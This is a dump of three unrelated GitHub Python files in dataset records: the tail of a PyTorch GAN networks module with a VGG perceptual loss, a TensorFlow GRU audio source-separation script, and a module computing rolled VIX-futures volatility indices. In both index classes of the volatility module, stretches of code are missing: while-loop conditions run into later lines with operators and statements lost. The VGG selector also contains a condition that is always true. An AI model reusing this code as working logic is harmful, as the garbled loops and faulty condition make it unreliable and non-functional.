padding=1)\n down = [downrelu, downconv]\n up = [uprelu, upconv, upnorm]\n model = down + up\n else:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1)\n down = [downrelu, downconv, downnorm]\n up = [uprelu, upconv, upnorm]\n\n if use_dropout:\n model = down + [submodule] + up + [nn.Dropout(0.5)]\n else:\n model = down + [submodule] + up\n\n self.model = nn.Sequential(*model)\n\n def forward(self, x):\n if self.outermost:\n return self.model(x)\n else:\n return torch.cat([self.model(x), x], 1)\n\n\n# Defines the PatchGAN discriminator with the specified arguments.\nclass NLayerDiscriminator(nn.Module):\n def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, use_sigmoid=False, gpu_ids=[]):\n super(NLayerDiscriminator, self).__init__()\n self.gpu_ids = gpu_ids\n\n kw = 4\n padw = int(np.ceil((kw - 1) / 2))\n sequence = [\n nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers):\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=2, padding=padw),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=1, padding=padw),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)]\n\n if use_sigmoid:\n sequence += [nn.Sigmoid()]\n\n self.model = nn.Sequential(*sequence)\n\n def forward(self, input):\n # if len(self.gpu_ids) and isinstance(input.data, torch.cuda.FloatTensor):\n # return nn.parallel.data_parallel(self.model, input, self.gpu_ids)\n # else:\n return self.model(input)\n\n\nclass NoNormDiscriminator(nn.Module):\n def __init__(self, input_nc, ndf=64, n_layers=3, use_sigmoid=False, gpu_ids=[]):\n super(NoNormDiscriminator, self).__init__()\n self.gpu_ids = gpu_ids\n\n kw = 4\n padw = int(np.ceil((kw - 1) / 2))\n sequence = [\n nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers):\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=1, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)]\n\n if use_sigmoid:\n sequence += [nn.Sigmoid()]\n\n self.model = nn.Sequential(*sequence)\n\n def forward(self, input):\n # if len(self.gpu_ids) and isinstance(input.data, torch.cuda.FloatTensor):\n # return nn.parallel.data_parallel(self.model, input, self.gpu_ids)\n # else:\n\n return self.model(input)\n\n\nclass NoNormAttentionDiscriminator(nn.Module):\n def __init__(self, input_nc, ndf=64, n_layers=3, use_sigmoid=False, gpu_ids=[]):\n super(NoNormAttentionDiscriminator, self).__init__()\n self.gpu_ids = gpu_ids\n self.n_layers = n_layers\n\n kw = 4\n padw = int(np.ceil((kw - 1) / 2))\n self.sequence = [\n nn.Conv2d(input_nc + 1, ndf, kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n self.atten_down_sequence = 
[nn.MaxPool2d(2)]\n\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers):\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n self.sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n self.atten_down_sequence += [nn.MaxPool2d(2)]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n self.sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=1, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n self.sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)]\n\n if use_sigmoid:\n self.sequence += [nn.Sigmoid()]\n\n # self.model = nn.Sequential(*self.sequence)\n\n def forward(self, input, atten):\n # if len(self.gpu_ids) and isinstance(input.data, torch.cuda.FloatTensor):\n # return nn.parallel.data_parallel(self.model, input, self.gpu_ids)\n # else:\n atten_squence = [atten]\n\n for n in range(0, self.n_layers):\n atten_squence.append(self.atten_down_sequence[n](atten_squence[n]))\n\n x = self.sequence[0](torch.cat([input, atten_squence[0]], 1))\n x = x * atten_squence[1]\n for n in range(1, self.n_layers):\n x = self.sequence[n](x)\n x = x * atten_squence[n + 1]\n\n x = self.sequence[self.n_layers](x)\n x = x * atten_squence[-1]\n\n out = self.sequence[-1](x)\n return out\n\n\nclass FCDiscriminator(nn.Module):\n def __init__(self, input_nc, ndf=64, n_layers=3, use_sigmoid=False, gpu_ids=[], patch=False):\n super(FCDiscriminator, self).__init__()\n self.gpu_ids = gpu_ids\n self.use_sigmoid = use_sigmoid\n kw = 4\n padw = int(np.ceil((kw - 1) / 2))\n sequence = [\n nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers):\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=1, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)]\n if patch:\n self.linear = nn.Linear(7 * 7, 1)\n else:\n self.linear = nn.Linear(13 * 13, 1)\n if use_sigmoid:\n self.sigmoid = nn.Sigmoid()\n\n self.model = nn.Sequential(*sequence)\n\n def forward(self, input):\n batchsize = input.size()[0]\n output = self.model(input)\n output = output.view(batchsize, -1)\n # print(output.size())\n output = self.linear(output)\n if self.use_sigmoid:\n print(\"sigmoid\")\n output = self.sigmoid(output)\n return output\n\n\nclass Vgg16(nn.Module):\n def __init__(self):\n super(Vgg16, self).__init__()\n self.conv1_1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1)\n self.conv1_2 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1)\n\n self.conv2_1 = nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1)\n self.conv2_2 = nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1)\n\n self.conv3_1 = nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1)\n self.conv3_2 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)\n self.conv3_3 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)\n\n self.conv4_1 = nn.Conv2d(256, 512, kernel_size=3, stride=1, padding=1)\n self.conv4_2 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1)\n self.conv4_3 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1)\n\n 
self.conv5_1 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1)\n self.conv5_2 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1)\n self.conv5_3 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1)\n\n def forward(self, X, opt):\n h = F.relu(self.conv1_1(X), inplace=True)\n h = F.relu(self.conv1_2(h), inplace=True)\n # relu1_2 = h\n h = F.max_pool2d(h, kernel_size=2, stride=2)\n\n h = F.relu(self.conv2_1(h), inplace=True)\n h = F.relu(self.conv2_2(h), inplace=True)\n # relu2_2 = h\n h = F.max_pool2d(h, kernel_size=2, stride=2)\n\n h = F.relu(self.conv3_1(h), inplace=True)\n h = F.relu(self.conv3_2(h), inplace=True)\n h = F.relu(self.conv3_3(h), inplace=True)\n # relu3_3 = h\n if opt.vgg_choose != \"no_maxpool\":\n h = F.max_pool2d(h, kernel_size=2, stride=2)\n\n h = F.relu(self.conv4_1(h), inplace=True)\n relu4_1 = h\n h = F.relu(self.conv4_2(h), inplace=True)\n relu4_2 = h\n conv4_3 = self.conv4_3(h)\n h = F.relu(conv4_3, inplace=True)\n relu4_3 = h\n\n if opt.vgg_choose != \"no_maxpool\":\n if opt.vgg_maxpooling:\n h = F.max_pool2d(h, kernel_size=2, stride=2)\n\n relu5_1 = F.relu(self.conv5_1(h), inplace=True)\n relu5_2 = F.relu(self.conv5_2(relu5_1), inplace=True)\n conv5_3 = self.conv5_3(relu5_2)\n h = F.relu(conv5_3, inplace=True)\n relu5_3 = h\n if opt.vgg_choose == \"conv4_3\":\n return conv4_3\n elif opt.vgg_choose == \"relu4_2\":\n return relu4_2\n elif opt.vgg_choose == \"relu4_1\":\n return relu4_1\n elif opt.vgg_choose == \"relu4_3\":\n return relu4_3\n elif opt.vgg_choose == \"conv5_3\":\n return conv5_3\n elif opt.vgg_choose == \"relu5_1\":\n return relu5_1\n elif opt.vgg_choose == \"relu5_2\":\n return relu5_2\n elif opt.vgg_choose == \"relu5_3\" or \"maxpool\":\n return relu5_3\n\n\ndef vgg_preprocess(batch, opt):\n tensortype = type(batch.data)\n (r, g, b) = torch.chunk(batch, 3, dim=1)\n batch = torch.cat((b, g, r), dim=1) # convert RGB to BGR\n batch = (batch + 1) * 255 * 0.5 # [-1, 1] -> [0, 255]\n if opt.vgg_mean:\n mean = tensortype(batch.data.size())\n mean[:, 0, :, :] = 103.939\n mean[:, 1, :, :] = 116.779\n mean[:, 2, :, :] = 123.680\n batch = batch.sub(Variable(mean)) # subtract mean\n return batch\n\n\nclass PerceptualLoss(nn.Module):\n def __init__(self, opt):\n super(PerceptualLoss, self).__init__()\n self.opt = opt\n self.instancenorm = nn.InstanceNorm2d(512, affine=False)\n\n def compute_vgg_loss(self, vgg, img, target):\n img_vgg = vgg_preprocess(img, self.opt)\n target_vgg = vgg_preprocess(target, self.opt)\n img_fea = vgg(img_vgg, self.opt)\n target_fea = vgg(target_vgg, self.opt)\n if self.opt.no_vgg_instance:\n return torch.mean((img_fea - target_fea) ** 2)\n else:\n return torch.mean((self.instancenorm(img_fea) - self.instancenorm(target_fea)) ** 2)\n\n\ndef load_vgg16(model_dir, gpu_ids):\n \"\"\" Use the model from https://github.com/abhiskk/fast-neural-style/blob/master/neural_style/utils.py \"\"\"\n if not os.path.exists(model_dir):\n os.mkdir(model_dir)\n if not os.path.exists(os.path.join(model_dir, 'vgg16.weight')):\n if not os.path.exists(os.path.join(model_dir, 'vgg16.t7')):\n os.system('wget https://www.dropbox.com/s/76l3rt4kyi3s8x7/vgg16.t7?dl=1 -O ' + os.path.join(model_dir,\n 'vgg16.t7'))\n vgglua = load_lua(os.path.join(model_dir, 'vgg16.t7'))\n vgg = Vgg16()\n for (src, dst) in zip(vgglua.parameters()[0], vgg.parameters()):\n dst.data[:] = src\n torch.save(vgg.state_dict(), os.path.join(model_dir, 'vgg16.weight'))\n vgg = Vgg16()\n # vgg.cuda()\n vgg.cuda(device=gpu_ids[0])\n 
vgg.load_state_dict(torch.load(os.path.join(model_dir, 'vgg16.weight')))\n vgg = torch.nn.DataParallel(vgg, gpu_ids)\n return vgg\n\n\nclass max_operation(nn.Module):\n def __init__(self):\n super(max_operation, self).__init__()\n # self.bias = Variable(torch.FloatTensor([0.0]), requires_grad=True).cuda()\n # 初始化\n\n def forward(self, img):\n img = img.cpu().float().numpy()\n x = np.maximum(img[:, :, :-1, :], img[:, :, 1:, :])\n x = np.concatenate((x, np.expand_dims(img[:, :, -1, :], 2)), 2)\n\n y = np.maximum(x[:, :, :, :-1], x[:, :, :, 1:])\n y = np.concatenate((y, np.expand_dims(x[:, :, :, -1], 3)), 3)\n\n y = torch.from_numpy(y).cuda()\n\n return y\n\n\nclass edge_operation(nn.Module):\n def __init__(self):\n super(edge_operation, self).__init__()\n\n def __call__(self, img):\n img = img.cpu().float().numpy()\n\n x1 = img[:, :, :-1, :] - img[:, :, 1:, :]\n x1 = np.concatenate((x1, np.expand_dims(img[:, :, -1, :], 2)), 2)\n\n x2 = img[:, :, 1:, :] - img[:, :, :-1, :]\n x2 = np.concatenate((np.expand_dims(img[:, :, 0, :], 2), x2), 2)\n\n y1 = img[:, :, :, :-1] - img[:, :, :, 1:]\n y1 = np.concatenate((y1, np.expand_dims(img[:, :, :, -1], 3)), 3)\n\n y2 = img[:, :, :, 1:] - img[:, :, :, :-1]\n y2 = np.concatenate((np.expand_dims(img[:, :, :, 0], 3), y2), 3)\n\n img = (np.abs(x1) + np.abs(x2) + np.abs(y1) + np.abs(y2)) / 4.0\n\n y = torch.from_numpy(img).cuda()\n\n return y\n","repo_name":"KarelZhang/CSDNet-CSDGAN","sub_path":"models/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":31066,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"94"} +{"seq_id":"26095482761","text":"import tensorflow as tf\nimport numpy as np\n# import tensorflow.compat.v1 as tf1\nfrom tensorflow import keras as k\n\nn_fft=1024\nEPOCHS=10\nBS=64\nnum_hidden_units = [256, 256, 256]\nnum_features = n_fft // 2 + 1\n#[batch_size, n_frames (time), n_frequencies]\nx_mixed=np.random.rand(64,10,513)\npath=r\"E:\\FinalDS\\mix\\*.npy\"\nmodelpath=r\"C:\\Users\\Axiomatize\\Desktop\\Singing_Voice_Separation_RNN-master\\BossModel\"\n\ndef load(mixpath):\n vocpath=tf.strings.regex_replace(mixpath,'mix','voc')\n dtype=16\n voc = tf.io.decode_raw(tf.io.read_file(vocpath), tf.float16)\n remove_len = 1024//dtype\n voc = voc[remove_len:]\n voc=tf.reshape(voc,(-1,1,513))\n voc=voc[:1000]\n voc=tf.reshape(voc,(-1,10,513))\n\n voc=tf.cast(voc,tf.float32)\n mix=voc;mel=voc\n # mix2=tf.cast(np.random.rand(64,10,513),tf.float32)\n # mix3=tf.cast(np.random.rand(64,10,513),tf.float32)\n return (mix,(voc,mel))\n\ntrainset=(\n tf.data.Dataset\n .list_files(path)\n .map(load)\n .flat_map(lambda mix, voc: tf.data.Dataset.zip((\n tf.data.Dataset.from_tensor_slices(mix),\n zip(tf.data.Dataset.from_tensor_slices(voc[0]),tf.data.Dataset.from_tensor_slices(voc[1])))))\n .batch(BS,drop_remainder=True,num_parallel_calls=tf.data.AUTOTUNE)\n .prefetch(tf.data.AUTOTUNE))\n\nx_mixed=k.Input(shape=(10,513))\nrnn_layer = tf.keras.layers.RNN([tf.keras.layers.GRUCell(256),\n tf.keras.layers.GRUCell(256),\n tf.keras.layers.GRUCell(256)],\n return_sequences=True,\n return_state=True, \n dtype = tf.float32)\noutputs = rnn_layer(x_mixed)\noutputs=outputs[0]\n\ny_hat_src1 = tf.keras.layers.Dense (units = num_features,activation ='relu')(outputs)\n\ny_hat_src2 = tf.keras.layers.Dense (units = num_features,activation ='relu')(outputs)\n\ny_tilde_src1 = y_hat_src1 / (y_hat_src1 + y_hat_src2 + np.finfo(float).eps) * x_mixed\ny_tilde_src2 = y_hat_src2 / (y_hat_src1 + y_hat_src2 + np.finfo(float).eps) 
* x_mixed\n\nmodel = k.Model(inputs=x_mixed, outputs=[y_tilde_src1,y_tilde_src2])\n\nadam=tf.keras.optimizers.Adam(learning_rate=0.001)\n\nmodel.compile(loss=[k.losses.MeanSquaredError(),k.losses.MeanSquaredError()],optimizer=adam)\n# model = tf.keras.models.load_model(modelpath)\nmodel.summary()\n# H = model.fit(\n# \tx=trainset,\n# \tepochs=EPOCHS)\n\n# model.save(\"BossModel\")\n","repo_name":"120205690/Audio-Source-Separation","sub_path":"Code/tf2model.py","file_name":"tf2model.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11559865873","text":"\r\n#********************************************************************\r\n# This file contains the functions for Volatility Strategies\r\n#********************************************************************\r\n#*****************************************************************************\r\n# IMPORTS\r\n#*****************************************************************************\r\n\r\n#*************************\r\n# IMPORT PYTHON LIBRAIRIES\r\n#*************************\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport datetime\r\nfrom os import chdir\r\nimport os\r\nimport sqlite3\r\n\r\n#**********************************\r\n# IMPORT NYC ENGINEERING LIBRAIRIES\r\n#**********************************\r\nos.chdir(r'K:\\ED_ExcelTools\\Transfert\\Structuring\\Proprietary Indices\\Python Script\\US Structuring Libraries')\r\nfrom class_CalendarUS import * \r\nfrom DB_functions import *\r\nfrom class_Strategy import *\r\n\r\n# this function transforms an excel date to a datetime\r\ndef minimalist_xldate_as_datetime(xldate, datemode):\r\n # datemode: 0 for 1900-based, 1 for 1904-based\r\n return (\r\n datetime.datetime(1899, 12, 30)\r\n + datetime.timedelta(days=xldate + 1462 * datemode)\r\n )\r\n# this function transforms datetime to an excel date\r\ndef inv_minimalist_xldate_as_datetime(date):\r\n # datemode: 0 for 1900-based, 1 for 1904-based\r\n return ((date -datetime.datetime(1899, 12, 30)).days\r\n )\r\n \r\n#**************************\r\n#**************************\r\n#** US VERSION\r\n#**************************\r\n#************************** \r\n \r\n#*****************************************************\r\n# US LAST TRADING DAY CALENDAR\r\n# **************************************************** \r\n#CBOE_VIX_FUT_Calendar: generates the FirstDayTrading // LastDayTrading // SettlementDate between the two years\r\n# The CBOE settlement date of a month is defined as follows:\r\n# The Wednesday 30-days prior to the 3rd Friday of next month\r\n# If the 3rd Friday of next month is not a BD: find the first BD-prior\r\n# If the day 30-prior is not a BD: find the first BD-prior\r\n \r\ndef CBOE_VIX_FUT_Calendar(iYearBegin,iYearEnd):\r\n #//US calendar creation\r\n startDate = datetime.datetime(iYearBegin-1,1,1) # we want a bigger interval\r\n endDate= datetime.datetime(iYearEnd+1,12,31) # we want a bigger interval\r\n calendarUS = Calendar(startDate,endDate)\r\n ExistingDates=calendarUS.BusinessDaysFixingDates\r\n lLastTradingDay=[]\r\n lSettlementDate=[]\r\n for k in range(0,iYearEnd+1-iYearBegin+1+1):\r\n year = iYearBegin-1+k\r\n #finds the settlement date and last trading date for each month\r\n for l in range(1,13):\r\n if l<12:\r\n month=l+1\r\n else:\r\n month=1\r\n year+=1\r\n #finds the 3rd friday of next month\r\n FirstDay = datetime.datetime(year,month,1).weekday()\r\n if 
FirstDay==5:\r\n Delay = 6\r\n elif FirstDay==6:\r\n Delay =5\r\n else:\r\n Delay = 4-FirstDay\r\n NextMonth3rdFriday = datetime.datetime(year,month,1+Delay+14)\r\n #Check if it is a business date:\r\n if ExistingDates.count(NextMonth3rdFriday)==0:\r\n NextMonth3rdFriday = datetime.datetime(year,month,1+Delay+13)\r\n #Find the Wednesday 30 days prior\r\n ExcelDate = inv_minimalist_xldate_as_datetime(NextMonth3rdFriday)\r\n ExcelDate-=30\r\n Settlement_Date= minimalist_xldate_as_datetime(float(ExcelDate),0)\r\n if ExistingDates.count(Settlement_Date)==0:\r\n Settlement_Date = calendarUS.addBusinessDays(-1,Settlement_Date)\r\n #carefull, the rule changed on November 14\r\n if Settlement_Date>=datetime.datetime(2014,11,1):\r\n Last_Trading_Date=Settlement_Date\r\n else: \r\n Last_Trading_Date= calendarUS.addBusinessDays(-1,Settlement_Date)\r\n #save\r\n lSettlementDate.append(Settlement_Date)\r\n lLastTradingDay.append(Last_Trading_Date) \r\n dfCBOE_VIX_FUT_Calendar=pd.DataFrame({'FirstTradingDay':lLastTradingDay,'LastTradingDay':lLastTradingDay,'SettlementDate':lSettlementDate})\r\n dfCBOE_VIX_FUT_Calendar['LastTradingDay']=dfCBOE_VIX_FUT_Calendar['LastTradingDay'].shift(-1)\r\n dfCBOE_VIX_FUT_Calendar['SettlementDate']=dfCBOE_VIX_FUT_Calendar['SettlementDate'].shift(-1)\r\n dfCBOE_VIX_FUT_Calendar=dfCBOE_VIX_FUT_Calendar.dropna()\r\n dfCBOE_VIX_FUT_Calendar=dfCBOE_VIX_FUT_Calendar[dfCBOE_VIX_FUT_Calendar['FirstTradingDay']>=datetime.datetime(iYearBegin-1,12,1)]\r\n dfCBOE_VIX_FUT_Calendar=dfCBOE_VIX_FUT_Calendar[dfCBOE_VIX_FUT_Calendar['FirstTradingDay']<=datetime.datetime(iYearEnd+1,1,1)]\r\n dfCBOE_VIX_FUT_Calendar.reset_index(inplace=True)\r\n dfCBOE_VIX_FUT_Calendar=dfCBOE_VIX_FUT_Calendar.drop('index',1)\r\n dfCBOE_VIX_FUT_Calendar['LengthPeriod']=0.0\r\n for k in range(0,len(dfCBOE_VIX_FUT_Calendar)):\r\n FirstDay=dfCBOE_VIX_FUT_Calendar['FirstTradingDay'][k]\r\n #exlude the first trading day, include the last one\r\n FirstDay=calendarUS.addBusinessDays(1,FirstDay)\r\n LastDay=dfCBOE_VIX_FUT_Calendar['LastTradingDay'][k]\r\n dfCBOE_VIX_FUT_Calendar['LengthPeriod'][k] = calendarUS.nbBusinessDaysBetweenTwoDates(FirstDay,LastDay)\r\n return dfCBOE_VIX_FUT_Calendar \r\n \r\n#*****************************************************\r\n# US SHORT TERM ROLL\r\n# **************************************************** \r\n \r\nclass US_ST_Rolled_Vol_Index_NTX():\r\n def __init__(self,Contract1,Contract2,Contract3,dateBegin,dateEnd):\r\n \r\n Contract_list=[Contract1,Contract2,Contract3]\r\n calendar=Calendar(dateBegin, dateEnd).BusinessDaysFixingDates\r\n newStrat= Asset_Price_getPrices(Contract_list,['Last_Price'],dateBegin,dateEnd,False,calendar)\r\n newStrat=newStrat.fillna(method='ffill')\r\n newStrat=newStrat.dropna()\r\n\r\n #read data\r\n \r\n startDate=newStrat.index[0]\r\n endDate=newStrat.index[len(newStrat)-1]\r\n iYearBegin=startDate.year\r\n iYearEnd=endDate.year\r\n \r\n #create CBOE Calendar\r\n dfCBOE_VIX_FUT_Calendar=CBOE_VIX_FUT_Calendar(iYearBegin,iYearEnd)\r\n lRollDates = dfCBOE_VIX_FUT_Calendar['LastTradingDay'].drop_duplicates().tolist()\r\n calendarUS = Calendar(startDate,endDate)\r\n #convert in datetime\r\n newStrat['Dates_Format']=newStrat.index\r\n #find the roll period for each date\r\n l=0\r\n while dfCBOE_VIX_FUT_Calendar['LastTradingDay'][l]dfCBOE_VIX_FUT_Calendar['LastTradingDay'][l]:\r\n l+=1\r\n newStrat['FirstTradingDay'][k]=dfCBOE_VIX_FUT_Calendar['FirstTradingDay'][l]\r\n newStrat['LastTradingDay'][k]=dfCBOE_VIX_FUT_Calendar['LastTradingDay'][l]\r\n 
newStrat['SettlementDate'][k]=dfCBOE_VIX_FUT_Calendar['SettlementDate'][l]\r\n newStrat['t'][k]=dfCBOE_VIX_FUT_Calendar['LengthPeriod'][l]\r\n if lRollDates.count(today)==1:\r\n newStrat['IsRoll'][k]=1 \r\n newStrat['r']=0.0\r\n for k in range(0,len(newStrat)):\r\n FirstDay=newStrat['Dates_Format'][k]\r\n LastDay = newStrat['LastTradingDay'][k]\r\n if FirstDay==LastDay:\r\n newStrat['r'][k]=0\r\n else: \r\n #from the next BD to the last trading day\r\n FirstDay=calendarUS.addBusinessDays(1,FirstDay)\r\n newStrat['r'][k]=calendarUS.nbBusinessDaysBetweenTwoDates(FirstDay,LastDay)\r\n #computes weights \r\n newStrat['W1']=newStrat['r']/newStrat['t']\r\n newStrat['W2']=(newStrat['t']-newStrat['r'])/newStrat['t']\r\n\r\n newStrat['Index']=100.0\r\n for k in range(1,len(newStrat)):\r\n if newStrat['Dates_Format'][k-1]==newStrat['LastTradingDay'][k-1]:\r\n #Yesterday was the roll day: W2 in the second contract= W2 in the first contract\r\n w1=newStrat['W2'][k-1]\r\n w2=newStrat['W1'][k-1]\r\n U1_yesterday = newStrat[\"Last_Price.\"+str(Contract2)][k-1]\r\n U2_yesterday=newStrat[\"Last_Price.\"+str(Contract3)][k-1]\r\n ValueYesterday= w1*U1_yesterday\r\n ValueToday = w1*newStrat[\"Last_Price.\"+str(Contract1)][k]\r\n else:\r\n w1=newStrat['W1'][k-1]\r\n w2=newStrat['W2'][k-1]\r\n U1_yesterday = newStrat[\"Last_Price.\"+str(Contract1)][k-1]\r\n U2_yesterday=newStrat[\"Last_Price.\"+str(Contract2)][k-1]\r\n ValueYesterday= w1*U1_yesterday+w2*U2_yesterday\r\n ValueToday = w1*newStrat[\"Last_Price.\"+str(Contract1)][k]+w2*newStrat[\"Last_Price.\"+str(Contract2)][k]\r\n newStrat['Index'][k]=newStrat['Index'][k-1]*ValueToday/ValueYesterday\r\n \r\n self.Index=newStrat\r\n \r\n\r\nclass US_MT_Rolled_Vol_Index_NTX():\r\n def __init__(self,Contract1,Contract2,Contract3,Contract4,Contract5,dateBegin,dateEnd):\r\n Contract_list=[Contract1,Contract2,Contract3,Contract4,Contract5]\r\n calendar=Calendar(dateBegin, dateEnd).BusinessDaysFixingDates\r\n newStrat= Asset_Price_getPrices(Contract_list,['Last_Price'],dateBegin,dateEnd,False,calendar)\r\n newStrat=newStrat.fillna(method='ffill')\r\n newStrat=newStrat.dropna()\r\n \r\n #read data\r\n \r\n startDate=newStrat.index[0]\r\n endDate=newStrat.index[len(newStrat)-1]\r\n iYearBegin=startDate.year\r\n iYearEnd=endDate.year\r\n \r\n #create CBOE Calendar\r\n dfCBOE_VIX_FUT_Calendar=CBOE_VIX_FUT_Calendar(iYearBegin,iYearEnd)\r\n lRollDates = dfCBOE_VIX_FUT_Calendar['LastTradingDay'].drop_duplicates().tolist()\r\n calendarUS = Calendar(startDate,endDate)\r\n #convert in datetime\r\n newStrat['Dates_Format']=newStrat.index\r\n l=0\r\n while dfCBOE_VIX_FUT_Calendar['LastTradingDay'][l]dfCBOE_VIX_FUT_Calendar['LastTradingDay'][l]:\r\n l+=1\r\n newStrat['FirstTradingDay'][k]=dfCBOE_VIX_FUT_Calendar['FirstTradingDay'][l]\r\n newStrat['LastTradingDay'][k]=dfCBOE_VIX_FUT_Calendar['LastTradingDay'][l]\r\n newStrat['SettlementDate'][k]=dfCBOE_VIX_FUT_Calendar['SettlementDate'][l]\r\n newStrat['t'][k]=dfCBOE_VIX_FUT_Calendar['LengthPeriod'][l]\r\n if lRollDates.count(today)==1:\r\n newStrat['IsRoll'][k]=1\r\n \r\n newStrat['r']=0.0\r\n for k in range(0,len(newStrat)):\r\n FirstDay=newStrat['Dates_Format'][k]\r\n LastDay = newStrat['LastTradingDay'][k]\r\n if FirstDay==LastDay:\r\n newStrat['r'][k]=0\r\n else: \r\n #from the next BD to the last trading day\r\n FirstDay=calendarUS.addBusinessDays(1,FirstDay)\r\n newStrat['r'][k]=calendarUS.nbBusinessDaysBetweenTwoDates(FirstDay,LastDay)\r\n \r\n newStrat['W1']=newStrat['r']/newStrat['t']\r\n newStrat['W2']=1.0\r\n 
newStrat['W3']=1.0\r\n newStrat['W4']=(newStrat['t']-newStrat['r'])/newStrat['t']\r\n \r\n \r\n newStrat['Index']=100.0\r\n for k in range(1,len(newStrat)):\r\n if newStrat['Dates_Format'][k-1]==newStrat['LastTradingDay'][k-1]:\r\n #Yesterday was the roll day: W2 in the second contract= W2 in the first contract\r\n w1=1.0\r\n w2=1.0\r\n w3=1.0\r\n w4=0.0\r\n U1_yesterday = newStrat[\"Last_Price.\"+str(Contract2)][k-1]\r\n U2_yesterday=newStrat[\"Last_Price.\"+str(Contract3)][k-1]\r\n U3_yesterday=newStrat[\"Last_Price.\"+str(Contract4)][k-1]\r\n U4_yesterday=newStrat[\"Last_Price.\"+str(Contract5)][k-1]\r\n ValueYesterday= w1*U1_yesterday+w2*U2_yesterday+w3*U3_yesterday\r\n ValueToday= w1*newStrat[\"Last_Price.\"+str(Contract1)][k]+w2*newStrat[\"Last_Price.\"+str(Contract2)][k]+w3*newStrat[\"Last_Price.\"+str(Contract3)][k]\r\n else:\r\n w1=newStrat['W1'][k-1]\r\n w2=1.0\r\n w3=1.0\r\n w4=newStrat['W4'][k-1]\r\n U1_yesterday = newStrat[\"Last_Price.\"+str(Contract1)][k-1]\r\n U2_yesterday=newStrat[\"Last_Price.\"+str(Contract2)][k-1]\r\n U3_yesterday=newStrat[\"Last_Price.\"+str(Contract3)][k-1]\r\n U4_yesterday=newStrat[\"Last_Price.\"+str(Contract4)][k-1]\r\n ValueYesterday= w1*U1_yesterday+w2*U2_yesterday+w3*U3_yesterday+w4*U4_yesterday\r\n ValueToday = w1*newStrat[\"Last_Price.\"+str(Contract1)][k]+w2*newStrat[\"Last_Price.\"+str(Contract2)][k]+w3*newStrat[\"Last_Price.\"+str(Contract3)][k]+w4*newStrat[\"Last_Price.\"+str(Contract4)][k]\r\n newStrat['Index'][k]=newStrat['Index'][k-1]*ValueToday/ValueYesterday\r\n \r\n self.Index=newStrat\r\n \r\n 